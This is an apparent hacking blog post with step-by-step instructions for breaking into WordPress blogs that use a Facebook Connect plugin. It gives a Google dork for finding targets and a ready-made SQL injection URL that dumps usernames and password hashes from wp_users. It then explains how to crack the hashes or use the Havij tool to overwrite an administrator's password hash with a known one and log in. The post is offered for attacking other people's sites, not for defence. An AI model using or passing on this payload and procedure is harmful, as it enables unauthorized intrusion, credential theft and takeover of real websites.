Hack Wordpress Blogs

There is so many bloggers using Facebook Connect Wordpress plugin for their blogs. They think it's cool. But it could be a Big Security hole. Here's the way to hack these sites.

Step 1 :
http://www.google.com

Step 2:Now enter this dork to find sites with security hole..

inurl:"fbconnect_action=myhome"

 
Step 3: You will find many sites, Select the site which you are comfortable with. 

You will find something like that.

Step 4: Now replace

?fbconnect_action=myhome&userid=

with this

?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 5: Now you have the User name and Password.

Step 6: The password is encrypted with Wordpress md5 (blowfish). You need to decode this. Download and run this software to decode this type of password.


Step 7: Then find the administrator panel out. Normally it should be in

www.victrimsite.com/wp-admin

  or

www.victrimsite.com/wp-login.php

Note: Decoding this type of password may take a big time.

So you here is another way to hack the password.....


Step 1: Open Havij and paste the blog url you are going to hack..

Example:

http://www.victrimsite.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat%28user_login,0x3a,user_pass%29z0mbyak,7,8,9,10,11,12+from+wp_users--

Step 2: Now find Databases, Tables.

Step 3: Select wp-users then find tick on all columns. Then click on Get Data.

Step 4: You will find something like that..

Step 5: Now select any user and change the user_pass to

$P$BbCzkVXQ6r.T8znShDPMSzM7Whhubc/

Step 6: Now login with the password hackintruths


If you got any problem comment here, We will try our best to solve that.